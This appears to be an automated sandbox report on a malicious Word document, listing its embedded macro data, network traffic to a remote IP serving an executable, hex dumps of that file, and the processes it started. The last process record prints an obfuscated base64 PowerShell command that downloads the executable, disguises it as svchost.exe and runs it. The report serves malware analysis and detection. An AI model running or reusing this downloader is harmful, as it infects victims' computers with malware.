        Data ASCII:. 4 . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . d . ^ h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . J . m ! O f f i c g O . f . i . c g . .
        Data Raw:01 34 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 64 0e 5e 68 09 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

        Network Behavior

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        May 23, 2024 20:15:10.473993063 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:10.499895096 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:10.499994993 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:10.500318050 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:10.539403915 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.277391911 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.277637959 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.277784109 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.278464079 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.279295921 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.279311895 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.279325962 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.279352903 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.279369116 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.280919075 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.281797886 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.281816959 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.281860113 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.283374071 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.283447027 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.288388014 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.289606094 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.289665937 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.291301966 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.417114973 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.417246103 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.417639971 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.418045998 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.418107033 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.418679953 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.419272900 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.419374943 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.419909954 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.419925928 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.419981956 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.420556068 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.421020985 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.421067953 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.421665907 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.422261953 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.422310114 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.422908068 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.422923088 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.422971010 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.424149990 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.424164057 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.424207926 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.425426960 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.425997972 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.426013947 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.426048994 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.426620960 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.426671982 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.427257061 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.427273035 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.427325964 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:11.428446054 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.428462029 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:11.428524017 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.534297943 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.534318924 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.534441948 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.537650108 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.537712097 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.538696051 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.538707018 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.538713932 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.538755894 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.539808035 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.539818048 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.539860964 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.540908098 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.540918112 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.540952921 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.541811943 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.541822910 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.541831970 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.541862011 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.544461012 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.544473886 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.544514894 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.545334101 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.545347929 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.545392036 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.546257973 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.546268940 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.546298027 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.547128916 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.547141075 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.547148943 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.547180891 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.548047066 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.548058987 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.548084974 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.548911095 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.548922062 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.548964977 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.549815893 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.549827099 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.549858093 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.550632954 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.555768013 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.556106091 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.556433916 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.556466103 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.559402943 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.559902906 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.559953928 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.562346935 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.562357903 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.562397003 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.564686060 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.564697027 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.564721107 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.566611052 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.566621065 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.566629887 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.566639900 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.566649914 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.566657066 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.566669941 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.567039013 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.567049026 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.567090988 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.567810059 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.567819118 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.567847013 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.569780111 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.569788933 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.569818974 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.570019960 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.570030928 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.570055008 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.570755959 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.570765972 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.570797920 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.573122025 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.574512005 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.575248957 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.575258970 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.575277090 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.577485085 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.577495098 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.577533007 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.578238964 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.579781055 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.579792023 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.579798937 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.579813004 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.580568075 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.580578089 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.580600977 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.581249952 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.581259012 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.581289053 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.582775116 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.582782984 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.582814932 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.587239027 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.588012934 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.588052034 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.589483976 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.589503050 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.589540958 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.590260983 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.590270042 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.590306997 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.591032982 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.591042995 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.591078043 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.591878891 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.591888905 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.591928959 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.592350960 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.592372894 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.592391968 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.592406034 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.593267918 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.593306065 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.594144106 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.594152927 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.594191074 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.595083952 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.595961094 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.595993042 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.596853018 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.596860886 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.596894979 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.599565983 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.599575043 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.599608898 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.600394964 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.601232052 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.601242065 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.601249933 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.601268053 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.601288080 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.602070093 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.602804899 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.602814913 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.602823019 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.602833033 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.602840900 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.602861881 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.603566885 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.603576899 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.603585958 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.603595018 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.603610992 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.604304075 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.604314089 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.604342937 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.605310917 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.605319977 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.605329037 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.605336905 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.605348110 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.605369091 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.607156992 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.607166052 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.607173920 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.607182026 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.607197046 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.609009981 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.609018087 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.609026909 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.609035015 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.609056950 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.609074116 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.610866070 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.610876083 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.610883951 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.610908031 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.611773968 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.612685919 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.612694025 CEST804916145.84.0.173192.168.2.22
        May 23, 2024 20:15:12.612725973 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:12.829396963 CEST4916180192.168.2.2245.84.0.173
        May 23, 2024 20:15:13.272742033 CEST4916180192.168.2.2245.84.0.173

        HTTP Request Dependency Graph

        • 45.84.0.173

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.224916145.84.0.173803084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        TimestampBytes transferredDirectionData
        May 23, 2024 20:15:10.500318050 CEST83OUTGET /download_22/server.exe HTTP/1.1
        Host: 45.84.0.173
        Connection: Keep-Alive
        May 23, 2024 20:15:11.277391911 CEST1236INHTTP/1.1 200 OK
        Date: Thu, 23 May 2024 18:15:11 GMT
        Server: Apache/2.4.38 (Debian)
        Last-Modified: Tue, 21 May 2024 06:39:08 GMT
        ETag: "2d000-618f1132a7b00"
        Accept-Ranges: bytes
        Content-Length: 184320
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdos-program
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 af 24 42 6c eb 45 2c 3f eb 45 2c 3f eb 45 2c 3f 56 0a ba 3f ea 45 2c 3f f5 17 a8 3f f4 45 2c 3f f5 17 b9 3f fb 45 2c 3f f5 17 af 3f 89 45 2c 3f cc 83 57 3f ec 45 2c 3f eb 45 2d 3f 86 45 2c 3f f5 17 a6 3f ea 45 2c 3f f5 17 b8 3f ea 45 2c 3f f5 17 bd 3f ea 45 2c 3f 52 69 63 68 eb 45 2c 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 09 4a 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 90 00 00 00 2c f4 01 00 00 00 00 f7 15 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 f4 01 00 04 00 00 c9 24 [TRUNCATED]
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$BlE,?E,?E,?V?E,??E,??E,??E,?W?E,?E-?E,??E,??E,??E,?RichE,?PELJd,@$P.text `.rdatafjl@@.data\.@.rsrc.@@
        May 23, 2024 20:15:11.277637959 CEST224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: %h@;BuU S39]uSSSSS-ME;tVEEEPSuEPEEB)MxE
        May 23, 2024 20:15:11.278464079 CEST1236INData Raw: 8d 45 e0 50 53 e8 7d 06 00 00 59 59 8b c6 5e 5b c9 c3 8b ff 55 8b ec 8b 45 08 56 33 f6 3b c6 75 1c e8 29 16 00 00 56 56 56 56 56 c7 00 16 00 00 00 e8 b1 15 00 00 83 c4 14 33 c0 eb 06 8b 40 0c 83 e0 10 5e 5d c3 8b ff 55 8b ec 51 83 65 fc 00 56 8d
        Data Ascii: EPS}YY^[UEV3;u)VVVVV3@^]UQeVEPuu8u9EttM^jhA#eu;5H3w"jYeV YEEE#jYUVuSW=@=7
        May 23, 2024 20:15:11.279295921 CEST1236INData Raw: e8 a3 21 00 00 59 53 e8 5b 22 00 00 59 3b c6 74 07 50 e8 91 21 00 00 59 e8 b3 2e 00 00 84 5d c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 c4 89 00 00 89 45 e0 39 75 e4 75 06 50 e8 d2 23 00 00 e8 f9 23 00 00 89 7d fc eb 35 8b 45
        Data Ascii: !YS["Y;tP!Y.]tMjYQPVh@E9uuP##}5EMPQ-YYeEE}uP##EE3@eE.;xU(84B44B04B,4B5(4B=$4BfP4BfD4Bf 4Bf
        May 23, 2024 20:15:11.279311895 CEST1236INData Raw: ac fd ff ff 83 60 70 fd 83 c8 ff e9 c8 0a 00 00 f6 46 0c 40 75 5e 56 e8 93 43 00 00 59 ba 80 13 42 00 83 f8 ff 74 1b 83 f8 fe 74 16 8b c8 83 e1 1f 8b f0 c1 fe 05 c1 e1 06 03 0c b5 20 c5 33 02 eb 02 8b ca f6 41 24 7f 75 91 83 f8 ff 74 19 83 f8 fe
        Data Ascii: `pF@u^VCYBtt 3A$utt 3@$g3;]C, <Xw@333@jY;$%@
        May 23, 2024 20:15:11.279325962 CEST1236INData Raw: ff 89 85 e4 fd ff ff e9 35 04 00 00 8b 07 83 c7 04 89 bd dc fd ff ff 3b c6 74 3b 8b 48 04 3b ce 74 34 f7 85 f0 fd ff ff 00 08 00 00 0f bf 00 89 8d e4 fd ff ff 74 14 99 2b c2 d1 f8 c7 85 c8 fd ff ff 01 00 00 00 e9 f0 03 00 00 89 b5 c8 fd ff ff e9
        Data Ascii: 5;t;H;t4t+BPIYpeg4itqnt(otaU7EI/ tff
        May 23, 2024 20:15:11.280919075 CEST1236INData Raw: e8 76 f5 ff ff f6 85 f0 fd ff ff 08 59 74 1b f6 85 f0 fd ff ff 04 75 12 57 53 6a 30 8d 85 d8 fd ff ff e8 2e f5 ff ff 83 c4 0c 83 bd c8 fd ff ff 00 8b 85 e0 fd ff ff 74 66 85 c0 7e 62 8b b5 e4 fd ff ff 89 85 a0 fd ff ff 0f b7 06 ff 8d a0 fd ff ff
        Data Ascii: vYtuWSj0.tf~bPjEPFPFFu(9t MYuPY|tWSj t+Y
        May 23, 2024 20:15:11.281797886 CEST1236INData Raw: 00 00 83 26 00 59 83 c6 08 81 fe a8 12 42 00 7c dc be 88 11 42 00 5f 8b 06 85 c0 74 09 83 7e 04 01 75 03 50 ff d3 83 c6 08 81 fe a8 12 42 00 7c e6 5e 5b c3 8b ff 55 8b ec 8b 45 08 ff 34 c5 88 11 42 00 ff 15 bc a0 40 00 5d c3 6a 0c 68 78 fe 41 00
        Data Ascii: &YB|B_t~uPB|^[UE4B@]jhxA3G}397Bujh/YYu4B9tnj>Y;u3QjYY]9u,hWMCYYuWmYQ]>WRYE
        May 23, 2024 20:15:11.281816959 CEST1236INData Raw: c6 33 02 68 c4 41 00 00 6a 08 ff 35 ac 37 42 00 ff 15 94 a0 40 00 89 46 10 3b c7 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 cc a0 40 00 89 46 0c 3b c7 75 12 ff 76 10 57 ff 35 ac 37 42 00 ff 15 c4 a0 40 00 eb 9b 83 4e 08 ff 89 3e 89 7e 04
        Data Ascii: 3hAj57B@F;tjh hW@F;uvW57B@N>~@3F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhW@upU;wC+GAH
        May 23, 2024 20:15:11.283374071 CEST1236INData Raw: 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75 31 8b 1d 44 c6 33 02 eb 09 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d9 72 f0 3b d9 75 15 e8 a0 fa ff ff 8b d8 89 5d 08 85 db 75 07 33 c0 e9 09 02 00 00 53 e8 3a
        Data Ascii: ;r;u[{u];r;u1D3{u];r;u]u3S:YKC8tL3CUt|D#M#u)eHD9#U#uEUiDMLD3#u#Mj _G}MT+M
        May 23, 2024 20:15:11.288388014 CEST1236INData Raw: 83 c4 0c 5d c3 8b ff 55 8b ec 68 54 a2 40 00 ff 15 20 a0 40 00 85 c0 74 15 68 44 a2 40 00 50 ff 15 64 a0 40 00 85 c0 74 05 ff 75 08 ff d0 5d c3 8b ff 55 8b ec ff 75 08 e8 c8 ff ff ff 59 ff 75 08 ff 15 d4 a0 40 00 cc 6a 08 e8 43 f2 ff ff 59 c3 6a
        Data Ascii: ]UhT@ @thD@Pd@tu]UuYu@jCYj`YUVt;ur^]UVu3ut;ur^]U=03th03:Ytu03Y*0h@h@YYuBhgK@N<@$@


        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        Behavior

        Click to jump to process

        System Behavior

        General

        Target ID:0
        Start time:14:15:02
        Start date:23/05/2024
        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
        Imagebase:0x13fbe0000
        File size:1'423'704 bytes
        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        General

        Target ID:2
        Start time:14:15:03
        Start date:23/05/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
